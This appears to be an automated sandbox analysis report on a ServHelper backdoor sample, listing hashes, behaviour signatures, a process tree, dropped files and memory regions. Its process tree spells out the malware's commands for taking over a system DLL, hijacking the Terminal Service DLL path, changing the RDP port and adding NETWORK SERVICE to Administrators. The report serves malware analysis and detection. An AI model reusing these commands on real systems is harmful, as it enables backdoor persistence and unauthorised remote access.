Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
05-04-2024 04:47
General
-
Target
cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
-
Size
4.0MB
-
MD5
cb3cc551561883ab8fc4fb6fc837a469
-
SHA1
f74ae6d243342099d3fa500cbc630f4a244a8d82
-
SHA256
ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
-
SHA512
b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
-
SSDEEP
49152:MgG+0nnFa5xF1Azk6GehC1Vm6ctA6Ty0pQJb4Qate1YdM1TGHgzBut:M
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp" "c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5e2e6bbdcc5cb2b2a8e58e62380cbdeeb
SHA1fd3b0bbf8d08573d022e54ceb111e4dfe93ff752
SHA2562cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2
SHA51282ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317
-
C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmpFilesize
1KB
MD5e2ff148a195602967a078ffa782d563e
SHA1e6f8436b141fd4a67b835ac01d4db9ac91430d87
SHA25627145f5a87f8447c15d9e5a4d1febceb56da0933d28fa8f233262dc116065374
SHA512eb84de59250991956af5d1fd5e52c6587040db967493e9f3c84ef98161055758ec1607ff24fa8bf36208dd1a25aa4076ebb63e5a73ae863c19bed9d0ee3cfb33
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3eop0myz.x5o.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1Filesize
2.5MB
MD5841cc93778b4ec353d0075d717b90df4
SHA1287f652b7be199d127aab4655055654a6ea2bed6
SHA25677f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541
-
C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.dllFilesize
3KB
MD509102fe0b7e6302f160ab0fcde307c4b
SHA12b7a7bca1a5ac90613abad1941aa3d25c5288831
SHA256fc08a3e14a7b6f71ca88cc749905934e63eb813c22d765aa6a3c84b61a75cfeb
SHA5125cc111e0ee3b0f7f841456cf26f2593fdf5dad705c61829af2c775a3fd5e5b27345d911f64aac2d156be3942eede99512248e6f5aab9d07e6e3b2ce71c3f6ec4
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Windows\SysWOW64\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMPFilesize
652B
MD5216a7f213b3840a471c20b967436ccc5
SHA1cc95009d8a4be42486538345d9d33037c15c48ab
SHA256ceb2031e43595541e82fd58c550b239b3203de44aaf02d8056b64ffbb65aa64c
SHA5129c99222ec93600afbc555130c993a2ad4d6664cf1359b2be24d1d9515a823b2ec4af640c37dca036f2510c06fdbd85a64154d6dc70b73fd678de4bc07d9e7d38
-
\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.0.csFilesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdlineFilesize
369B
MD5947abf591dbf321409f38aeb2a3a3072
SHA19ac4db381c0a1c257d4886bfbc630c7e8469be82
SHA256a888796c34418732d33663846092d16d9940d32d4f5ad2f2183024147f8be8db
SHA51287aeb78d21518280d1c012d9bc115eed592e44025a8843fc745a4d11efee76ea35f26081240a2a72cf2e3d88f4eb9b148e1a06489ed2c82c41ca371b96c8826c
-
memory/1480-88-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/1480-80-0x0000000006F10000-0x0000000006F1A000-memory.dmpFilesize
40KB
-
memory/1480-67-0x000000006FDD0000-0x000000006FE1C000-memory.dmpFilesize
304KB
-
memory/1480-68-0x0000000070440000-0x0000000070794000-memory.dmpFilesize
3.3MB
-
memory/1480-78-0x0000000006A80000-0x0000000006A9E000-memory.dmpFilesize
120KB
-
memory/1480-79-0x0000000006D80000-0x0000000006E23000-memory.dmpFilesize
652KB
-
memory/1480-52-0x0000000002A80000-0x0000000002A90000-memory.dmpFilesize
64KB
-
memory/1480-51-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/1480-66-0x0000000006B40000-0x0000000006B72000-memory.dmpFilesize
200KB
-
memory/1480-87-0x00000000070F0000-0x00000000070F8000-memory.dmpFilesize
32KB
-
memory/1480-86-0x0000000007100000-0x000000000711A000-memory.dmpFilesize
104KB
-
memory/1480-81-0x0000000007150000-0x00000000071E6000-memory.dmpFilesize
600KB
-
memory/1480-84-0x00000000070C0000-0x00000000070D4000-memory.dmpFilesize
80KB
-
memory/1480-83-0x00000000070B0000-0x00000000070BE000-memory.dmpFilesize
56KB
-
memory/1480-82-0x0000000007070000-0x0000000007081000-memory.dmpFilesize
68KB
-
memory/2332-144-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/2332-120-0x0000000004F10000-0x0000000004F20000-memory.dmpFilesize
64KB
-
memory/2332-132-0x000000007F4E0000-0x000000007F4F0000-memory.dmpFilesize
64KB
-
memory/2332-133-0x000000006FDD0000-0x000000006FE1C000-memory.dmpFilesize
304KB
-
memory/2332-134-0x0000000070440000-0x0000000070794000-memory.dmpFilesize
3.3MB
-
memory/2332-119-0x0000000004F10000-0x0000000004F20000-memory.dmpFilesize
64KB
-
memory/2332-130-0x0000000004F10000-0x0000000004F20000-memory.dmpFilesize
64KB
-
memory/2332-118-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/2848-91-0x0000000004E00000-0x0000000004E10000-memory.dmpFilesize
64KB
-
memory/2848-90-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/2848-117-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/2848-93-0x0000000004E00000-0x0000000004E10000-memory.dmpFilesize
64KB
-
memory/2848-106-0x000000006FDD0000-0x000000006FE1C000-memory.dmpFilesize
304KB
-
memory/2848-107-0x0000000070440000-0x0000000070794000-memory.dmpFilesize
3.3MB
-
memory/3332-63-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-9-0x0000000007A70000-0x0000000007AD6000-memory.dmpFilesize
408KB
-
memory/3332-64-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-0-0x00000000002E0000-0x00000000006EB000-memory.dmpFilesize
4.0MB
-
memory/3332-53-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/3332-1-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/3332-2-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-3-0x0000000005CA0000-0x00000000060A4000-memory.dmpFilesize
4.0MB
-
memory/3332-4-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-65-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-85-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-5-0x0000000006650000-0x0000000006BF4000-memory.dmpFilesize
5.6MB
-
memory/3332-6-0x00000000062A0000-0x0000000006332000-memory.dmpFilesize
584KB
-
memory/3332-7-0x0000000005880000-0x0000000005890000-memory.dmpFilesize
64KB
-
memory/3332-8-0x0000000006460000-0x000000000646A000-memory.dmpFilesize
40KB
-
memory/5092-32-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-12-0x00000000029A0000-0x00000000029D6000-memory.dmpFilesize
216KB
-
memory/5092-92-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-16-0x0000000005310000-0x0000000005938000-memory.dmpFilesize
6.2MB
-
memory/5092-103-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-105-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-15-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-14-0x0000000004CD0000-0x0000000004CE0000-memory.dmpFilesize
64KB
-
memory/5092-13-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/5092-17-0x0000000004FB0000-0x0000000004FD2000-memory.dmpFilesize
136KB
-
memory/5092-18-0x0000000005150000-0x00000000051B6000-memory.dmpFilesize
408KB
-
memory/5092-89-0x0000000074830000-0x0000000074FE0000-memory.dmpFilesize
7.7MB
-
memory/5092-28-0x00000000059C0000-0x0000000005D14000-memory.dmpFilesize
3.3MB
-
memory/5092-29-0x0000000005F80000-0x0000000005F9E000-memory.dmpFilesize
120KB
-
memory/5092-30-0x0000000005FB0000-0x0000000005FFC000-memory.dmpFilesize
304KB
-
memory/5092-33-0x00000000075C0000-0x0000000007C3A000-memory.dmpFilesize
6.5MB
-
memory/5092-34-0x00000000064E0000-0x00000000064FA000-memory.dmpFilesize
104KB
-
memory/5092-47-0x0000000006550000-0x0000000006558000-memory.dmpFilesize
32KB
-
memory/5092-145-0x0000000007510000-0x0000000007532000-memory.dmpFilesize
136KB
-
memory/5092-50-0x0000000007250000-0x000000000727C000-memory.dmpFilesize
176KB